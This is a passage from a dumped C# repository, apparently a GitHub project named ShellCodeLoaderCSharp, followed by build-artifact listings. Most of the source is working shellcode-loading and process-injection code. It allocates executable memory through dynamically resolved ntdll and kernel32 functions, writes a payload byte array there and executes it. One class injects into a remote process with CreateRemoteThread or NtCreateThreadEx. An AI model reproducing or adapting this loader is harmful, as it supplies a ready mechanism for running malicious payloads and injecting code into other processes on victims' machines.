122 | Imports.Delegates.NtAllocateVirtualMemory NtAllocateVirtualMemory = (Imports.Delegates.NtAllocateVirtualMemory)Marshal.GetDelegateForFunctionPointer(ExportedNtAllocateVirtualMemory, typeof(Imports.Delegates.NtAllocateVirtualMemory));
123 | NtAllocateVirtualMemory(Imports.GetCurrentProcess(), ref ptr, IntPtr.Zero, ref RegionSize, TypeAlloc.MEM_COMMIT | TypeAlloc.MEM_RESERVE, PageProtection.PAGE_EXECUTE_READWRITE);
124 |
125 | UIntPtr bytesWritten;
126 | IntPtr ExportedNtWriteVirtualMemory = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.NTDLL), "NtWriteVirtualMemory");
127 | Imports.Delegates.NtWriteVirtualMemory NtWriteVirtualMemory = (Imports.Delegates.NtWriteVirtualMemory)Marshal.GetDelegateForFunctionPointer(ExportedNtWriteVirtualMemory, typeof(Imports.Delegates.NtWriteVirtualMemory));
128 | NtWriteVirtualMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out bytesWritten);
129 |
130 | PageProtection flOld = new PageProtection();
131 | IntPtr ExportedNtProtectVirtualMemory = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.NTDLL), "NtProtectVirtualMemory");
132 | Imports.Delegates.NtProtectVirtualMemory NtProtectVirtualMemory = (Imports.Delegates.NtProtectVirtualMemory)Marshal.GetDelegateForFunctionPointer(ExportedNtProtectVirtualMemory, typeof(Imports.Delegates.NtProtectVirtualMemory));
133 | NtProtectVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, PageProtection.PAGE_EXECUTE_READ, ref flOld);
134 |
135 | ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
136 | load();
137 |
138 | IntPtr ExportedNtFreeVirtualMemory = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.NTDLL), "NtFreeVirtualMemory");
139 | Imports.Delegates.NtFreeVirtualMemory NtFreeVirtualMemory = (Imports.Delegates.NtFreeVirtualMemory)Marshal.GetDelegateForFunctionPointer(ExportedNtFreeVirtualMemory, typeof(Imports.Delegates.NtFreeVirtualMemory));
140 | NtFreeVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, FreeType.MEM_RELEASE);
141 | }
142 |
143 | private void Kernel32Delegates()
144 | {
145 | IntPtr ExportedVirtualAlloc = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.KERNEL32), "VirtualAlloc");
146 | Imports.Delegates.VirtualAlloc VirtualAlloc = (Imports.Delegates.VirtualAlloc)Marshal.GetDelegateForFunctionPointer(ExportedVirtualAlloc, typeof(Imports.Delegates.VirtualAlloc));
147 | this.ptr = VirtualAlloc(IntPtr.Zero, (IntPtr)ShellCode.Length, TypeAlloc.MEM_COMMIT | TypeAlloc.MEM_RESERVE, PageProtection.PAGE_EXECUTE_READWRITE);
148 |
149 | UIntPtr writtenBytes;
150 | IntPtr ExportedWriteProcessMemory = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.KERNEL32), "WriteProcessMemory");
151 | Imports.Delegates.WriteProcessMemory WriteProcessMemory = (Imports.Delegates.WriteProcessMemory)Marshal.GetDelegateForFunctionPointer(ExportedWriteProcessMemory, typeof(Imports.Delegates.WriteProcessMemory));
152 | WriteProcessMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out writtenBytes);
153 |
154 | PageProtection flOld;
155 | IntPtr ExportedVirtualProtect = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.KERNEL32), "VirtualProtect");
156 | Imports.Delegates.VirtualProtect VirtualProtect = (Imports.Delegates.VirtualProtect)Marshal.GetDelegateForFunctionPointer(ExportedVirtualProtect, typeof(Imports.Delegates.VirtualProtect));
157 | VirtualProtect(ptr, RegionSize, PageProtection.PAGE_EXECUTE_READ, out flOld);
158 |
159 | ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
160 | load();
161 |
162 | IntPtr ExportedVirtualFree = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.KERNEL32), "VirtualFree");
163 | Imports.Delegates.VirtualFree VirtualFree = (Imports.Delegates.VirtualFree)Marshal.GetDelegateForFunctionPointer(ExportedVirtualFree, typeof(Imports.Delegates.VirtualFree));
164 | Imports.VirtualFree(ptr, (uint)0, FreeType.MEM_RELEASE);
165 | }
166 |
167 | private static class Imports
168 | {
169 |
170 | internal const String KERNEL32 = "kernel32.dll";
171 | internal const String NTDLL = "ntdll.dll";
172 |
173 | [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
174 | public static extern uint NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref uint RegionSize, TypeAlloc AllocationType, PageProtection Protect);
175 |
176 | [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
177 | public static extern uint NtWriteVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] buffer, UIntPtr bufferSize, out UIntPtr written);
178 |
179 | [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
180 | public static extern uint NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint numberOfBytes, PageProtection newProtect, ref PageProtection oldProtect);
181 |
182 | [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
183 | public static extern uint NtFreeVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint RegionSize, FreeType FreeType);
184 |
185 |
186 |
187 | [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
188 | public static extern IntPtr VirtualAlloc(IntPtr address, IntPtr numBytes, TypeAlloc commitOrReserve, PageProtection pageProtectionMode);
189 |
190 | [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
191 | public static extern IntPtr VirtualFree(IntPtr lpAddress, uint dwSize, FreeType FreeType);
192 |
193 | [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
194 | public static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, PageProtection flNewProtect, out PageProtection lpflOldProtect);
195 |
196 | [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
197 | public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, UIntPtr nSize, out UIntPtr lpNumberOfBytesWritten);
198 |
199 | [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
200 | public static extern IntPtr GetCurrentProcess();
201 |
202 | [DllImport(KERNEL32)]
203 | public static extern IntPtr GetModuleHandle(string lpModuleName);
204 |
205 | [DllImport(KERNEL32)]
206 | public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
207 |
208 | internal static class Delegates
209 | {
210 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
211 | public delegate uint NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref uint RegionSize, TypeAlloc AllocationType, PageProtection Protect);
212 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
213 | public delegate uint NtWriteVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] buffer, UIntPtr bufferSize, out UIntPtr written);
214 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
215 | public delegate uint NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint numberOfBytes, PageProtection newProtect, ref PageProtection oldProtect);
216 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
217 | public delegate uint NtFreeVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint RegionSize, FreeType FreeType);
218 |
219 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
220 | public delegate IntPtr VirtualAlloc(IntPtr address, IntPtr numBytes, TypeAlloc commitOrReserve, PageProtection pageProtectionMode);
221 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
222 | public delegate IntPtr VirtualFree(IntPtr lpAddress, uint dwSize, FreeType FreeType);
223 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
224 | public delegate bool VirtualProtect(IntPtr lpAddress, uint dwSize, PageProtection flNewProtect, out PageProtection lpflOldProtect);
225 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
226 | public delegate bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, UIntPtr nSize, out UIntPtr lpNumberOfBytesWritten);
227 | }
228 | }
229 |
230 | private bool _disposed = false;
231 |
232 | // Instantiate a SafeHandle instance.
233 | private SafeHandle _safeHandle = new SafeFileHandle(IntPtr.Zero, true);
234 |
235 | // Public implementation of Dispose pattern callable by consumers.
236 | public void Dispose() => Dispose(true);
237 |
238 | // Protected implementation of Dispose pattern.
239 | protected virtual void Dispose(bool disposing)
240 | {
241 | if (_disposed)
242 | {
243 | return;
244 | }
245 |
246 | if (disposing)
247 | {
248 | // Dispose managed state (managed objects).
249 | _safeHandle?.Dispose();
250 | }
251 |
252 | _disposed = true;
253 | GC.SuppressFinalize(this);
254 | }
255 | }
256 | }
257 |
--------------------------------------------------------------------------------
/ShellCodeLoader/ShellCodeLoader.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {B2A57A97-4D88-4942-A4B3-06AA466080F2}
8 | Library
9 | Properties
10 | ShellCodeLoader
11 | ShellCodeLoader
12 | v4.0
13 | 512
14 | true
15 |
16 |
17 |
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | none
28 | true
29 | bin\Release\
30 | TRACE
31 | prompt
32 | 4
33 | true
34 |
35 |
36 | true
37 | bin\x64\Debug\
38 | DEBUG;TRACE
39 | full
40 | x64
41 | 7.3
42 | prompt
43 |
44 |
45 | bin\x64\Release\
46 | TRACE
47 | true
48 | pdbonly
49 | x64
50 | 7.3
51 | prompt
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
--------------------------------------------------------------------------------
/ShellCodeLoader/ShellCodeLoaderEx.cs:
--------------------------------------------------------------------------------
1 | using Microsoft.Win32.SafeHandles;
2 | using System;
3 | using System.Diagnostics;
4 | using System.Runtime.InteropServices;
5 | using static ShellCodeLoader.Shared;
6 | /*
7 | || AUTHOR Arsium ||
8 | || github : https://github.com/arsium ||
9 | || Please let this credit for all the time I worked on ||
10 | */
11 | namespace ShellCodeLoader
12 | {
13 | public class ShellCodeLoaderEx
14 | {
15 | private byte[] ShellCode;
16 | private IntPtr ptr;
17 | private uint RegionSize;
18 | private Process Target;
19 |
20 | public ShellCodeLoaderEx(Process target, byte[] shellCode)
21 | {
22 | this.ShellCode = shellCode;
23 | this.RegionSize = (uint)shellCode.Length;
24 | this.ptr = IntPtr.Zero;
25 | this.Target = target;
26 | }
27 |
28 | public void LoadWithNT()
29 | {
30 | NT();
31 | }
32 |
33 | public void LoadWithKernel32()
34 | {
35 | Kernel32();
36 | }
37 |
38 | private void NT()
39 | {
40 | Imports.NtAllocateVirtualMemory(Target.Handle, ref ptr, IntPtr.Zero, ref RegionSize, TypeAlloc.MEM_COMMIT | TypeAlloc.MEM_RESERVE, PageProtection.PAGE_EXECUTE_READWRITE);
41 | UIntPtr bytesWritten;
42 |
43 | Imports.NtWriteVirtualMemory(Target.Handle, ptr, ShellCode, (UIntPtr)ShellCode.Length, out bytesWritten);
44 |
45 | PageProtection flOld = new PageProtection();
46 | Imports.NtProtectVirtualMemory(Target.Handle, ref ptr, ref RegionSize, PageProtection.PAGE_EXECUTE_READ, ref flOld);
47 |
48 | IntPtr hThread = IntPtr.Zero;
49 | Imports.NtCreateThreadEx(ref hThread, AccessMask.GENERIC_EXECUTE, IntPtr.Zero, Target.Handle, ptr, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero);
50 | //
51 | //Imports.CLIENT_ID cid = new Imports.CLIENT_ID();
52 | //Imports.RtlCreateUserThread(Target.Handle, IntPtr.Zero, false, 0, IntPtr.Zero, IntPtr.Zero, ptr, IntPtr.Zero, ref hThread, cid);
53 | }
54 |
55 | private void Kernel32()
56 | {
57 | this.ptr = Imports.VirtualAllocEx(Target.Handle, IntPtr.Zero, (IntPtr)ShellCode.Length, TypeAlloc.MEM_COMMIT | TypeAlloc.MEM_RESERVE, PageProtection.PAGE_EXECUTE_READWRITE);
58 |
59 | UIntPtr writtenBytes;
60 | Imports.WriteProcessMemory(Target.Handle, ptr, ShellCode, (UIntPtr)ShellCode.Length, out writtenBytes);
61 |
62 | PageProtection flOld;
63 | Imports.VirtualProtectEx(Target.Handle, ptr, RegionSize, PageProtection.PAGE_EXECUTE_READ, out flOld);
64 |
65 | IntPtr hThread = Imports.CreateRemoteThread(Target.Handle, IntPtr.Zero, 0, ptr, IntPtr.Zero, Imports.ThreadCreationFlags.NORMAL, out hThread);
66 | }
67 |
68 | private static class Imports
69 | {
70 | internal const String KERNEL32 = "kernel32.dll";
71 | internal const String NTDLL = "ntdll.dll";
72 |
73 |
74 | [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
75 | public static extern uint NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref uint RegionSize, TypeAlloc AllocationType, PageProtection Protect);
76 |
77 | [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
78 | public static extern uint NtWriteVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] buffer, UIntPtr bufferSize, out UIntPtr written);
79 |
80 | [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
81 | public static extern uint NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint numberOfBytes, PageProtection newProtect, ref PageProtection oldProtect);
82 |
83 | [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
84 | public static extern uint NtFreeVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint RegionSize, FreeType FreeType);
85 |
86 | [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
87 | public static extern uint NtCreateThreadEx(ref IntPtr threadHandle, AccessMask desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr startAddress, IntPtr parameter, bool inCreateSuspended, Int32 stackZeroBits, Int32 sizeOfStack, Int32 maximumStackSize, IntPtr attributeList);
88 |
89 | [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
90 | public static extern IntPtr RtlCreateUserThread(IntPtr processHandle, IntPtr threadSecurity, bool createSuspended, Int32 stackZeroBits, IntPtr stackReserved, IntPtr stackCommit, IntPtr startAddress, IntPtr parameter, ref IntPtr threadHandle, CLIENT_ID clientId);
91 |
92 |
93 | [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
94 | public static extern IntPtr VirtualAllocEx(IntPtr procHandle,IntPtr address, IntPtr numBytes, TypeAlloc commitOrReserve, PageProtection pageProtectionMode);
95 |
96 | [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
97 | public static extern IntPtr VirtualFree(IntPtr lpAddress, uint dwSize, FreeType FreeType);
98 |
99 | [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
100 | public static extern bool VirtualProtectEx(IntPtr procHandle, IntPtr lpAddress, uint dwSize, PageProtection flNewProtect, out PageProtection lpflOldProtect);
101 |
102 | [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
103 | public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, UIntPtr nSize, out UIntPtr lpNumberOfBytesWritten);
104 |
105 | [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
106 | public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, ThreadCreationFlags dwCreationFlags, out IntPtr lpThreadId);
107 |
108 |
109 | [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
110 | public static extern IntPtr GetCurrentProcess();
111 |
112 | [DllImport(KERNEL32)]
113 | public static extern IntPtr GetModuleHandle(string lpModuleName);
114 |
115 | [DllImport(KERNEL32)]
116 | public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
117 |
118 |
119 | [Flags]
120 | public enum ThreadCreationFlags : uint
121 | {
122 | NORMAL = 0x0,
123 | CREATE_SUSPENDED = 0x00000004,
124 | STACK_SIZE_PARAM_IS_A_RESERVATION = 0x00010000
125 | }
126 |
127 | [StructLayout(LayoutKind.Sequential, Pack = 0)]
128 | public struct CLIENT_ID
129 | {
130 | public IntPtr UniqueProcess;
131 | public IntPtr UniqueThread;
132 | }
133 | }
134 |
135 | private bool _disposed = false;
136 |
137 | // Instantiate a SafeHandle instance.
138 | private SafeHandle _safeHandle = new SafeFileHandle(IntPtr.Zero, true);
139 |
140 | // Public implementation of Dispose pattern callable by consumers.
141 | public void Dispose() => Dispose(true);
142 |
143 | // Protected implementation of Dispose pattern.
144 | protected virtual void Dispose(bool disposing)
145 | {
146 | if (_disposed)
147 | {
148 | return;
149 | }
150 |
151 | if (disposing)
152 | {
153 | // Dispose managed state (managed objects).
154 | _safeHandle?.Dispose();
155 | }
156 |
157 | _disposed = true;
158 | GC.SuppressFinalize(this);
159 | }
160 | }
161 | }
162 |
--------------------------------------------------------------------------------
/ShellCodeLoader/ShellCodeLoaderMinimalNativeAPI.cs:
--------------------------------------------------------------------------------
1 | using Microsoft.Win32.SafeHandles;
2 | using System;
3 | using System.Runtime.InteropServices;
4 | using System.Threading;
5 | using System.Threading.Tasks;
6 | using static ShellCodeLoader.Shared;
7 |
8 | namespace ShellCodeLoader
9 | {
10 | public class ShellCodeLoaderMinimalNativeAPI : IDisposable
11 | {
12 | private byte[] ShellCode;
13 | private uint RegionSize;
14 | ///
15 | /// Default is false.
16 | ///
17 | public bool Asynchronous { get; set; }
18 |
19 |
20 | public ShellCodeLoaderMinimalNativeAPI(byte[] shellCode)
21 | {
22 | this.ShellCode = shellCode;
23 | this.RegionSize = (uint)shellCode.Length;
24 | this.Asynchronous = false;
25 | }
26 |
27 | public void LoadWithMinimalAPI()
28 | {
29 | if (this.Asynchronous)
30 | {
31 | Task.Factory.StartNew(() => { MinimalAPI(); }, CancellationToken.None, TaskCreationOptions.None, TaskScheduler.Default);
32 | }
33 | else
34 | {
35 | MinimalAPI();
36 | }
37 | }
38 | private unsafe void MinimalAPI()
39 | {
40 | fixed(void* ptr = &this.ShellCode[0])
41 | {
42 | PageProtection flOld;
43 | Imports.VirtualProtect((IntPtr)ptr, RegionSize, Shared.PageProtection.PAGE_EXECUTE_READWRITE, out flOld);
44 |
45 | ShellCodeCaller s = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer((IntPtr)ptr, typeof(ShellCodeCaller));
46 | s();
47 | }
48 | }
49 | internal static class Imports
50 | {
51 |
52 | internal const String KERNEL32 = "kernel32.dll";
53 | [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
54 | public static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, Shared.PageProtection flNewProtect, out Shared.PageProtection lpflOldProtect);
55 | }
56 |
57 | private bool _disposed = false;
58 |
59 | // Instantiate a SafeHandle instance.
60 | private SafeHandle _safeHandle = new SafeFileHandle(IntPtr.Zero, true);
61 |
62 | // Public implementation of Dispose pattern callable by consumers.
63 | public void Dispose() => Dispose(true);
64 |
65 | // Protected implementation of Dispose pattern.
66 | protected virtual void Dispose(bool disposing)
67 | {
68 | if (_disposed)
69 | {
70 | return;
71 | }
72 |
73 | if (disposing)
74 | {
75 | // Dispose managed state (managed objects).
76 | _safeHandle?.Dispose();
77 | }
78 |
79 | _disposed = true;
80 | GC.SuppressFinalize(this);
81 | }
82 | }
83 | }
84 |
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/Debug/.NETFramework,Version=v4.0.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName = ".NET Framework 4")]
5 |
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/Debug/.NETFramework,Version=v4.5.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]
5 |
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/ShellCodeLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.AssemblyReference.cache
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 2f4efe2492a647ca473cd41a9e195057146d9428
2 |
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | F:\Personal\ShellCodeLoader\ShellCodeLoader\bin\Debug\ShellCodeLoader.dll
2 | F:\Personal\ShellCodeLoader\ShellCodeLoader\bin\Debug\ShellCodeLoader.pdb
3 | F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\Debug\ShellCodeLoader.csproj.AssemblyReference.cache
4 | F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\Debug\ShellCodeLoader.csproj.CoreCompileInputs.cache
5 | F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\Debug\ShellCodeLoader.dll
6 | F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\Debug\ShellCodeLoader.pdb
7 |
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/Debug/ShellCodeLoader.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/ShellCodeLoader/obj/Debug/ShellCodeLoader.dll
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/Debug/ShellCodeLoader.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/ShellCodeLoader/obj/Debug/ShellCodeLoader.pdb
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/Release/.NETFramework,Version=v4.0.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName = ".NET Framework 4")]
5 |
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/Release/.NETFramework,Version=v4.5.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]
5 |
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/ShellCodeLoader/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
1 | ������
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | d13612e3ee84b59d0abdaff95468991f181618fb
2 |
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | F:\Personal\ShellCodeLoader\ShellCodeLoader\bin\Release\ShellCodeLoader.dll
2 | F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\Release\ShellCodeLoader.csproj.CoreCompileInputs.cache
3 | F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\Release\ShellCodeLoader.dll
4 | F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\Release\ShellCodeLoader.csproj.AssemblyReference.cache
5 |
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/Release/ShellCodeLoader.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/ShellCodeLoader/obj/Release/ShellCodeLoader.dll
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/Release/ShellCodeLoader.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/ShellCodeLoader/obj/Release/ShellCodeLoader.pdb
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/x64/Release/.NETFramework,Version=v4.0.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName = ".NET Framework 4")]
5 |
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/x64/Release/.NETFramework,Version=v4.5.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]
5 |
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/ShellCodeLoader/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.csproj.AssemblyReference.cache
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 1ba3ce01bd1fed7e622dc2a6a7acac9a7b78349d
2 |
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | F:\Personal\ShellCodeLoader\ShellCodeLoader\bin\x64\Release\ShellCodeLoader.dll
2 | F:\Personal\ShellCodeLoader\ShellCodeLoader\bin\x64\Release\ShellCodeLoader.pdb
3 | F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\x64\Release\ShellCodeLoader.csproj.CoreCompileInputs.cache
4 | F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\x64\Release\ShellCodeLoader.dll
5 | F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\x64\Release\ShellCodeLoader.pdb
6 | F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\x64\Release\ShellCodeLoader.csproj.AssemblyReference.cache
7 |
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.dll:
--------------------------------------------------------------------------------
